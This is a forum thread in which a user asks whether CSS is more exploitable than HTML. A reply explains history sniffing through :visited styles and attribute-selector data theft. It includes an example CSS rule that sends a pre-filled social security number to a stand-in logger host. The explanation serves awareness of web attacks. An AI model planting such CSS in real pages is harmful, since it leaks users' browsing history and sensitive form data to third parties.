Question

CSS

By matthewjohn938 ·
Is CSS vulnerable to exploitation more than HTML?
Thread display: Collapse - | Expand +

All Answers

Collapse -

css

by deborasumopayroll In reply to CSS

The Visited Link Concern
This one goes like this:

You put a link to a particular page on your site, say <a href="https://i-tickle-pigs.com">Tickle Pigs</a>
You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
You test the computed style of that link.
If it’s pink, this user is a pig tickler.
You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.
You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.

The Data Thief
This one goes like this:

If I can get some of my nefarious CSS onto a page where you’ve authenticated into a site…
And that site displays sensitive information like a social security number (SSN) in a pre-filled form…
I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
A billion selectors and you’ve covered all the possibilities!

Related Discussions

Related Forums